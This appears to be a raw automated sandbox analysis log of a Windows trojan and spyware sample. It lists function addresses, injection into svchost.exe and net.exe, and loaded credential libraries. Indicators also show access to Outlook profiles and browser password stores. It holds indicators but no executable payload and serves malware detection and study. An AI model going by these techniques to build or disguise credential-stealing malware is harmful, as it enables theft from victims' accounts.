                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C03FD22_2_03C03FD2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C03FD52_2_03C03FD5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C41F922_2_03C41F92
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFFFB12_2_03CFFFB1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFFF092_2_03CFFF09
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C49EB02_2_03C49EB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5FDC02_2_03C5FDC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C43D402_2_03C43D40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF1D5A2_2_03CF1D5A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF7D732_2_03CF7D73
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFFCF22_2_03CFFCF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB9C322_2_03CB9C32
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_034BA352
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_034C03E6
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_0340E3F0
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_034A0274
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_034802C0
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_03488158
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_033F0100
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_0349A118
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_034B81CC
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_034C01AA
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_034B41A2
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_03492000
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_03424750
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_03400770
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_033FC7C0
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_0341C6E0
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_03400535
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_034C0591
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_034B2446
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_034A4420
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_034AE4F6
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_034BAB40
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_034B6BD7
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_033FEA80
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_03416962
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_034029A0
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_034CA9A6
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_0340A840
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_03402840
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_033E68B8
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_0342E8F0
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_03474F40
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_03442F28
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_03420F30
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_034A2F30
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_0340CFE0
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_0347EFA0
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_033F2FC8
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_03400E59
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_034BEE26
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_034BEEDB
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_03412E90
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_034BCE93
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_0340AD00
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_0349CD1F
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_033FADE0
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_03418DBF
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_03400C00
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_033F0CF2
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_034A0CB5
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_034B132D
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_033ED34C
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_0344739A
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_0341B2C0
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_034A12ED
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_034052A0
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_034CB16B
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_0343516C
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_033EF172
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_0340B1B0
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_034070C0
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_034AF0CC
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_034B70E9
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_034BF0E0
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_034BF7B0
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_03445630
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_034B16CC
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_034B7571
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_034C95C3
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_0349D5B0
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_033F1460
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_034BF43F
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_034BFB76
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_03475BF0
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_0343DBF9
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_0341FB80
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_034BFA49
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_034B7A46
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_03473A6C
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_034ADAC6
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_03445AA0
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_0349DAAC
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_034A1AA3
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_03409950
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_0341B950
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_03495910
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_0346D800
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_034038E0
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_034BFF09
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_03401F92
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_034BFFB1
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_03409EB0
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_03403D40
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_034B1D5A
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_034B7D73
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_0341FDC0
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_03479C32
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_034BFCF2
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_02971F80
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_0296CEA0
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_0296D0C0
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_0296B140
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_029755E0
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_0297381B
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_02973820
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_0298BC20
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_0320E304
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_03215224
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_0320E1E4
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_0320D768
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_0320E46C
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exe | Code function: String function: 00445975 appears 65 times
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exe | Code function: String function: 0041171A appears 37 times
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exe | Code function: String function: 0041718C appears 45 times
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exe | Code function: String function: 0040E6D0 appears 35 times
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03C87E54 appears 111 times
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03CBF290 appears 105 times
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03C75130 appears 58 times
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03C2B970 appears 280 times
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03CAEA12 appears 86 times
                Source: C:\Windows\SysWOW64\net.exe | Code function: String function: 03435130 appears 58 times
                Source: C:\Windows\SysWOW64\net.exe | Code function: String function: 0347F290 appears 105 times
                Source: C:\Windows\SysWOW64\net.exe | Code function: String function: 033EB970 appears 280 times
                Source: C:\Windows\SysWOW64\net.exe | Code function: String function: 03447E54 appears 111 times
                Source: C:\Windows\SysWOW64\net.exe | Code function: String function: 0346EA12 appears 86 times
                Source: XhAQ0Rk63O.exe, 00000000.00000003.1423114263.0000000004813000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs XhAQ0Rk63O.exe
                Source: XhAQ0Rk63O.exe, 00000000.00000003.1422631324.00000000049BD000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs XhAQ0Rk63O.exe
                Source: XhAQ0Rk63O.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/2@16/10
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exe | Code function: 0_2_0044AF5C GetLastError,FormatMessageW
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exe | Code function: 0_2_00464422 OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exe | Code function: 0_2_004364AA GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exe | Code function: 0_2_0045D517 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exe | Code function: 0_2_0043701F CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,__wcsicoll,CloseHandle
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exe | Code function: 0_2_0047A999 OleInitialize,CLSIDFromProgID,CoCreateInstance,CoInitializeSecurity,_memset,_wcslen,_memset,CoCreateInstanceEx,CoSetProxyBlanket
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exe | Code function: 0_2_0043614F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exe | File created: C:\Users\user\AppData\Local\Temp\Citlaltpetl
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exe | Command line argument: Wu (0_2_0040D7F0)
                Source: XhAQ0Rk63O.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exe | File read: C:\Users\desktop.ini
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: net.exe, 00000004.00000003.1761624549.0000000002FF1000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000002.3866320365.000000000301F000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000003.1763767098.0000000002FFC000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000003.1761497982.0000000002FD1000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000002.3866320365.0000000002FF1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: XhAQ0Rk63O.exe | ReversingLabs: Detection: 75%
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exe | File read: C:\Users\user\Desktop\XhAQ0Rk63O.exe
                Source: unknown | Process created: C:\Users\user\Desktop\XhAQ0Rk63O.exe "C:\Users\user\Desktop\XhAQ0Rk63O.exe"
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\XhAQ0Rk63O.exe"
                Source: C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\SysWOW64\net.exe"
                Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exe | Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exe | Section loaded: wsock32.dll
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exe | Section loaded: version.dll
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exe | Section loaded: winmm.dll
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exe | Section loaded: mpr.dll
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exe | Section loaded: wininet.dll
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exe | Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exe | Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exe | Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exe | Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exe | Section loaded: kernel.appcore.dll
                Source: C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe | Section loaded: wininet.dll
                Source: C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe | Section loaded: mswsock.dll
                Source: C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe | Section loaded: dnsapi.dll
                Source: C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe | Section loaded: iphlpapi.dll
                Source: C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe | Section loaded: fwpuclnt.dll
                Source: C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe | Section loaded: rasadhlp.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: mpr.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: samcli.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: iphlpapi.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: version.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: mlang.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: winsqlite3.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: vaultcli.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
                Source: C:\Windows\SysWOW64\net.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                Source: XhAQ0Rk63O.exe | Static file information: File size 1330101 > 1048576
                Source: Binary string: net.pdbUGP source: svchost.exe, 00000002.00000003.1542553129.000000000361A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1542599146.000000000363B000.00000004.00000020.00020000.00000000.sdmp, IislGDEHlLEZDm.exe, 00000003.00000003.1652356035.0000000000B00000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: IislGDEHlLEZDm.exe, 00000003.00000002.3863687071.000000000018E000.00000002.00000001.01000000.00000004.sdmp
                Source: Binary string: wntdll.pdbUGP source: XhAQ0Rk63O.exe, 00000000.00000003.1419274394.0000000004890000.00000004.00001000.00020000.00000000.sdmp, XhAQ0Rk63O.exe, 00000000.00000003.1423114263.00000000046F0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1452027710.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1453866402.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1574658216.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1574658216.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, net.exe, 00000004.00000002.3871197453.000000000355E000.00000040.00001000.00020000.00000000.sdmp, net.exe, 00000004.00000002.3871197453.00000000033C0000.00000040.00001000.00020000.00000000.sdmp, net.exe, 00000004.00000003.1574242672.000000000306C000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000003.1581774696.0000000003212000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: XhAQ0Rk63O.exe, 00000000.00000003.1419274394.0000000004890000.00000004.00001000.00020000.00000000.sdmp, XhAQ0Rk63O.exe, 00000000.00000003.1423114263.00000000046F0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.1452027710.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1453866402.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1574658216.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1574658216.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, net.exe, net.exe, 00000004.00000002.3871197453.000000000355E000.00000040.00001000.00020000.00000000.sdmp, net.exe, 00000004.00000002.3871197453.00000000033C0000.00000040.00001000.00020000.00000000.sdmp, net.exe, 00000004.00000003.1574242672.000000000306C000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000003.1581774696.0000000003212000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: IislGDEHlLEZDm.exe, 00000003.00000002.3874303163.000000000437C000.00000004.80000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.3866320365.0000000002F71000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000002.3871744953.00000000039EC000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.1869973892.00000000038FC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: IislGDEHlLEZDm.exe, 00000003.00000002.3874303163.000000000437C000.00000004.80000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.3866320365.0000000002F71000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000002.3871744953.00000000039EC000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.1869973892.00000000038FC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: net.pdb source: svchost.exe, 00000002.00000003.1542553129.000000000361A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1542599146.000000000363B000.00000004.00000020.00020000.00000000.sdmp, IislGDEHlLEZDm.exe, 00000003.00000003.1652356035.0000000000B00000.00000004.00000001.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exe Code function: 0_2_0040EB70 LoadLibraryA,GetProcAddress, 0_2_0040EB70
                Source: XhAQ0Rk63O.exe Static PE information: real checksum: 0xa2135 should be: 0x152f43
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exe Code function: 0_2_004171D1 push ecx; ret 0_2_004171E4
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00401ACE push eax; iretd 2_2_00401B68
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004061DF push FFFFFF9Bh; retf 2_2_004061E1
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0040AA1D push edi; retf 2_2_0040AA23
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00401B40 push eax; iretd 2_2_00401B68
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0041933F push ss; ret 2_2_00419355
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00405BF7 push FFFFFFE2h; iretd 2_2_00405BFD
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00404BB6 push ds; iretd 2_2_00404BB8
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00403420 push eax; ret 2_2_00403422
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00413CE3 push es; retf 2_2_00413D12
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00418F53 push esp; ret 2_2_00419157
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0040AF60 push 0000007Bh; iretd 2_2_0040AF62
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C0225F pushad ; ret 2_2_03C027F9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C027FA pushad ; ret 2_2_03C027F9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C309AD push ecx; mov dword ptr [esp], ecx 2_2_03C309B6
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C0283D push eax; iretd 2_2_03C02858
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C01368 push eax; iretd 2_2_03C01369
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C01065 push edi; ret 2_2_03C0108A
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C018F3 push edx; iretd 2_2_03C01906
                Source: C:\Windows\SysWOW64\net.exe Code function: 4_2_033F09AD push ecx; mov dword ptr [esp], ecx 4_2_033F09B6
                Source: C:\Windows\SysWOW64\net.exe Code function: 4_2_029627D4 push FFFFFFE2h; iretd 4_2_029627DA
                Source: C:\Windows\SysWOW64\net.exe Code function: 4_2_029708C0 push es; retf 4_2_029708EF
                Source: C:\Windows\SysWOW64\net.exe Code function: 4_2_02980E6A push esp; retf 4_2_02980E6B
                Source: C:\Windows\SysWOW64\net.exe Code function: 4_2_02962DBC push FFFFFF9Bh; retf 4_2_02962DBE
                Source: C:\Windows\SysWOW64\net.exe Code function: 4_2_02961793 push ds; iretd 4_2_02961795
                Source: C:\Windows\SysWOW64\net.exe Code function: 4_2_029675FA push edi; retf 4_2_02967600
                Source: C:\Windows\SysWOW64\net.exe Code function: 4_2_02975B30 push esp; ret 4_2_02975D34
                Source: C:\Windows\SysWOW64\net.exe Code function: 4_2_02967B3D push 0000007Bh; iretd 4_2_02967B3F
                Source: C:\Windows\SysWOW64\net.exe Code function: 4_2_0297B83A push esp; iretd 4_2_0297B85B
                Source: C:\Windows\SysWOW64\net.exe Code function: 4_2_02975F1C push ss; ret 4_2_02975F32
                Source: C:\Windows\SysWOW64\net.exe Code function: 4_2_03204360 push ss; retf 4_2_03204366
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exe Code function: 0_2_004772DE IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 0_2_004772DE
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exe Code function: 0_2_004375B0 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_004375B0
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\net.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\net.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\net.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\net.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\net.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
